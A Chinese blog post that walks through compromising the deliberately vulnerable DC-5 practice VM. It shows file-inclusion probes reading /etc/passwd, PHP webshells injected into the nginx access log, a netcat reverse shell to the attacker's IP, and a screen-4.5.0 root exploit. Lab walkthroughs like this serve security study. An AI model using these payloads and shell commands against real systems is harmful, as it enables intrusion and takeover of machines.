【DC系列】DC-5靶机渗透练习

最新推荐文章于 2023-03-14 19:33:38 发布
最新推荐文章于 2023-03-14 19:33:38 发布
阅读量395 收藏 1
点赞数 1
分类专栏: 渗透测试 DC系列靶场 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120008477
版权

1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.145

2.扫描端口,发现开启了三个端口:

nmap 192.168.225.145 -sV -sC -Pn -n -v -T5 -p-

3.访问页面,发现contact页面在提交留言后,出现改变,年份刷新一次改变一次,与提示相符,直接去访问thankyou.php也是一样的:

4.扫描目录:发现存在index.php,solutions.php,about-us.php,faq.php,contact.php,thankyou.php,footer.php七个页面

5.对状态为200的文件进行访问,注意:访问状态为200的文件,当访问到footer.php文件时,刷新一次年份会发生改变。

6.之前在thankyou.php中看到了这种情况(没网页刷新一次,年份都会发生变化),因此我们猜测thinkyou.php调用了footer.php,于是想到了文件包含漏洞

7.尝试是否存在文件包含,使用burp抓包:

/thankyou.php?file=/etc/passwd

发现确实存在文件包含

8.将一句话木马写入到php的日志文件中,包含文件:

在前面的nmap扫描中,我们已经知道该web服务器使用的是Nginx服务,并且在网站上的每一步操作都将会被写入日志文件log内,因此我们可以通过log来拿shell,写入phpinfo()进行探测,是否可以包含成功。

<?php phpinfo(); ?>

9.通过日志文件log查看是否写入成功,日志路径为:/var/log/nginx/access.log是系统默认路径,成功写入:

10.直接写系统执行语句,尝试能否带入命令:

通过BurpSuite抓包,并写入PHP的执行系统命令

<?php passthru($_GET['c']); ?>

关于passthru()函数的快速描述

passthru - 执行外部程序并显示原始输出

11.访问url看是不是写进去了:

http://192.168.225.145/thankyou.php?file=/var/log/nginx/access.log&c=cat /etc/passwd

注意:

当我们写入一句话木马:<?php @eval($_POST['cmd']);?>,可以通过写入日志文件的路径可以连接,但是蚁剑里面不能够打开终端。可能DC-5后台将eval函数被禁止了。所以我们只能选择别的道路,进行解决。

12.写入反弹shell的命令:

http://192.168.225.145/thankyou.php?file=/var/log/nginx/access.log&c=nc 192.168.225.133 7777 -c /bin/bash

13.成功反弹shell,进入交互式界面:

python -c "import pty;pty.spawn('/bin/bash')"

14.查看具有特殊权限的二进制文件,查找一下可以用root权限运行的命令

find / -perm -u=s -type f 2>/dev/null

15.这里我们发现了一个screen-4.5.0的这个特殊文件,searchsploit screen4.5.0一下,找到这个:

16.直接利用/usr/share/exploitdb/exploits/linux/local/目录下的41154.sh文件

先把这两个文件拷贝到根目录叭:

cp /usr/share/exploitdb/exploits/linux/local/41152.txt
cp /usr/share/exploitdb/exploits/linux/local/41154.sh

17.查看一下如何使用

18.以下是漏洞脚本文件的利用:

1)将41154.sh中上面一部分c语言代码另存为dc5.c,编译dc5.c文件

gcc -fPIC -shared -ldl -o dc.so dc5.c

2)将41154.sh中下面一部分c语言代码另存为dc-5.c编译dc-5.c文件

gcc -o dc-5 dc-5.c

3.将41154.sh中剩下部分代码另存为dc5.sh脚本文件,并在保存dc5.sh文件输入:set ff=unix,否则在执行脚本文件时后出错

4.用蚁剑连接,将这三个文件上传到服务器的/tmp目录下

5.为dc.sh增加可执行权限,执行dc.sh文件,成功获取到root权限

cd /tmp
chmod +x dc5.sh
./dc5.sh

6.获取root权限后,进入root目录下,成功获取flag文档

cd /root

最后让我不用蚁剑,再试一下ssh远程拷贝:

scp root@192.168.225.133:dc.so /tmp/
scp root@192.168.225.133:dc-5 /tmp/

4)开启一下kali的ssh服务:

首先修改一下配置文件的这两个地方:

/etc/init.d/ssh start 启动ssh服务
service ssh status 查看是否启动成功

很烦……

复现不出来,一直在调bug,今天脑壳太乱了

改天一定搞出来!监督自己!

malloc_冲!
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC5-靶机
Au
08-29 2159
下载地址 作者已经做了一个提示视频,地址 配置的环境: kali:192.168.25.131 DC5-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.135,判定为DC3-靶机,继续使用nmap获取详细信息 nmap -A -p 1...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-5靶机渗透
m0_62008601的博客
05-21 623
攻击机kali:192.168.56.102(桥接网络) 靶机dc-5:192.168.56.106 (仅主机网络) 两台主机的ip设置在同一网段之后开始扫描存活主机: 扫描端口: nmap -sV -p- 192.168.56.106 80端口开放,用浏览器进行访问 并没有发现什么信息 wappalyzer插件中可以看到web服务器为nginx,接着在页面摸索一番,发现contact下可以提交表单 随便输入信息提交之后我们发现跳转到了另外一个页面且发现底部的年份发生了..
DC系列(5)DC-5靶机渗透
Nikris的博客
01-12 975
DC-5
DC5靶机渗透测试
Huangshanyoumu的博客
04-17 384
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞发现1.访问靶机 web 服务2.尝试利用文件包含漏洞3.尝试将恶意文件写入日志4.利用文件包含访问日志并进行利用三、提权1.查看可以 root 权限使用的命令2.漏洞搜索3.查找 exp,并查看内容4.使用 ftp 进行传输文件 环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-5(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.2.186
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-5靶机渗透测试
读书 买花 长大
03-14 1191
DC-5
渗透项目】靶机DC-5渗透过程
命运的旋律的博客
04-17 557
信息收集 主机发现 nmap -sn 192.168.189.0/24 网站指纹 whatweb 192.168.189.134 端口扫描 nmap -sV -O -T4 -p- -Pn -sT 192.168.189.134 --script vuln 目录扫描 dirb http://192.168.189.134 /usr/share/dirb/wordlists/com...
渗透测试:DC-5靶机
Ciyaso的博客
08-21 252
一、扫描获取靶机ip arp-sacn -l 192.168.203.144 二、获取网站信息 1.nmap 开放80、111端口 2.Wappaloyzer 访问网站 Web服务器:Nginx 1.6.2 3.dirb dirb http://192.168.203.144 没有发现有价值的东西 三、提权 访问主页,发现只有contat存在交互 随便提交信息后进入thankyou.php 发现时间一直在改变 4.御剑 扫描发现 http://192.168.203.144/foot
Vulnhub靶机渗透测试——DC-5
Cobra的博客
05-11 991
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.184 靶机下载地址: 二、信息收集 1、使用nmap进行存活主机探测 nmap 192.168.189.0/24 2、发现IP192.168.189.184开放80,111端口,再次使用nmap对其进行扫描 nmap 192.168.189.184 -sV -T4 -A -p- 3、访问其80端口 4、浏览页面并没有发现可以进行漏洞利用的地方,使用
Vulnhub靶机渗透 -- DC5
Gh0st_1n_The_Shell的博客
09-02 93
通过nmap搜索到IP为:192.168.200.11 开启了80http、111RPC服务端口 先打开网页,然后进行目录爆破 contact.php 经搜索没有发现可以攻击wheello和nginx的漏洞,只能burpsuite抓包看看
dc-5 靶机渗透学习
..
03-20 1874
信息收集 扫描存活主机 nmap -sP 192.168.202.0/24 对靶机开放的端口服务进行扫描 nmap -A -p- -v 192.168.202.143 漏洞利用 访问80端口 ,用Wappalyzer识别框架,发现只是个简单的页面 查看一下源代码,发现有五个php文件,分别对应五个标题 来到Contact查看了一下,发现有几个地方可以填写信息,抓取发送的数据包查看了一下,没什么特别。 发送数据后会跳转到thankyou.php,并且...
DC-5靶机详细渗透过程
MRS_jianai的博客
12-21 482
DC-5靶机详细渗透过程
DC-5靶机渗透详细步骤
wwxxss
10-18 617
DC5渗透测试
靶机渗透练习73-DC5
hirak0的博客
04-21 729
靶机描述 靶机地址:http://www.vulnhub.com/entry/dc-5,314/ Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be great
渗透DC-1靶机设计思路
最新发布
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值